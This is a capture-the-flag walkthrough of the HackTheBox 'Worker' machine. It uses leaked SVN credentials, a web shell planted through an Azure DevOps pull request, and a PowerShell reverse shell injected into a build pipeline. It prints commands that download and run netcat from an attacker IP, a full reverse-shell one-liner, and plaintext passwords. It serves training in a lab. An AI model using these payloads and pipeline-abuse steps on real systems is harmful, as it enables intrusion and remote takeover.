Worker — HackTheBox
TL;DR
This box takes you through some of the repercussions of having an attacker gain a foothold in your organization and the how they would compromise you development infrastructure to pivot or gain persistence.
Foothold Reconnaissance
For the initial recon you will have to start with NMAP
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
This gives a couple of things to explore. The website at port 80 is just the default IIS webpage. Next up is the svnserve endpoint. Running on this endpoint is a Subversion Version Control System (like Git). Next step is to pull the repository from this endpoint to see where it leads.
svn checkout svn://worker.htb
The change logs will reveal credentials that will lead to the next pivot.
kali@kali:~/HTB/Worker$ svn log
--------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 lineAdded note that repo has been migrated
--------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 lineMoving this repo to our new devops server which will handle the deployment for us
--------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line-
--------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 lineAdded deployment script
--------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 lineFirst version
--------------------------------------------------------------------kali@kali:~/HTB/Worker$ svn diff -r 1:2
Index: deploy.ps1
===================================================================
--- deploy.ps1 (nonexistent)
+++ deploy.ps1 (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen"
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")kali@kali:~/HTB/Worker$ svn diff -r 4:5
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
The result reveal a subdomain of interest devops.worker.htb
and credentials. This subdomain is a locally deployed Azure Devops Portal. The credentials can be used to login as “nathen”.
There are multiple repos in this portal under the “SmartHotel360” project.
If you poke around you will land on the build pipeline from where you can see that each project is deployed to a subdomain that corresponds to the repository name.
For example “alpha.worker.htb”. When you access this page, the response headers reveal that this is a ASP.NET project.
Foothold
Since you now have access to the repo, the goal is to drop a shell in the repo and have it built and deployed. If you are on Kali, there is already a copy of such shell in “/usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx” .
You can create this file from the UI.
Create a PR and then merge to the main branch. When creating a PR a workitem has to be attached. If you start typing a suggestion will come up that you can select.
You can self approve the PR and then complete it. This will trigger a build and deployment when completed.
Once deployed you can navigate to the “/cmd.aspx” (the name of the reverse shell file created).
Through this shell you can initiate commands to get netcat on the box and the start a reverse shell.
cd \Windows\Temp\ && curl -O http://10.10.14.26:8000/nc64.exe
\Windows\Temp\nc64.exe 10.10.14.26 1337 -e cmd.exe
This box was running a script that resets the repository to initial state every 10 minutes. You will have to be quick. This will not happen in real life but in this case I am guessing it was done so that someone else will not stumble on your shell file.
User Reconnaissance
Once on the box you will realized that you cannot really do much you are the user “defaultapppool”.
kali@kali:~/HTB/Worker$ listen 1337
listening on [any] 1337 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 59604
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.c:\windows\system32\inetsrv>cd C:\Users
cd C:\UsersC:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 32D6-9041Directory of C:\Users2020-07-07 16:53 <DIR> .
2020-07-07 16:53 <DIR> ..
2020-03-28 14:59 <DIR> .NET v4.5
2020-03-28 14:59 <DIR> .NET v4.5 Classic
2020-08-17 23:33 <DIR> Administrator
2020-03-28 14:01 <DIR> Public
2020-07-22 00:11 <DIR> restorer
2020-07-08 18:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10�303�868�928 bytes freeC:\Users>cd robisl
cd robisl
Access is denied.C:\Users>whoami
whoami
iis apppool\defaultapppool
You will need credentials for the user “robisl”. Digging around you will discover the file `W:\svnrepos\www\conf\passwd`
type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.[users]
...
robisl = wolves11
...
User Flag
With these credential you can leverage Evil-WinRM to connect as this “robisl” and grab the user file
kali@kali:~/HTB/Tools$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11Evil-WinRM shell v2.3Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> dirDirectory: C:\Users\robisl\DesktopMode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/6/2020 4:21 AM 34 user.txt*Evil-WinRM* PS C:\Users\robisl\Desktop>
Root Reconnaissance
Since we have credentials for the user “robisl” you will need to explore what are some of the things he can do in the Azure DevOps portal.
This user can create a pipeline. You can include powershell code when constructing a pipeline. This is the what will be leveraged to get the root flag.
Root Flag
To Create a pipeline, go to the pipeline blade and click on “New pipeline”. Then select “Azure Repos Git” followed by the actual repository. The next step is to select a project type that fit the pipeline that you are creating; it does not really matter what you select here as we will change in the next step. When presented with the yaml in the final step, replace the “steps” with the following that will trigger a powershell.
- task: PowerShell@2
timeoutInMinutes: 10
inputs:
targetType: 'inline'
script: "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.26',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Save and run.
When the power shell task is executed, a reverse shell will be initiated.
The shell I got was not very stable and hence I had a limited time to go in and get the flag.
kali@kali:~/HTB/Worker$ listen 4443
listening on [any] 4443 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 51469PS W:\agents\agent11\_work\14\s> cd C:
PS C:\> cd Users\Administrator
PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> lsDirectory: C:\Users\Administrator\DesktopMode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2020-12-07 18:06 34 root.txt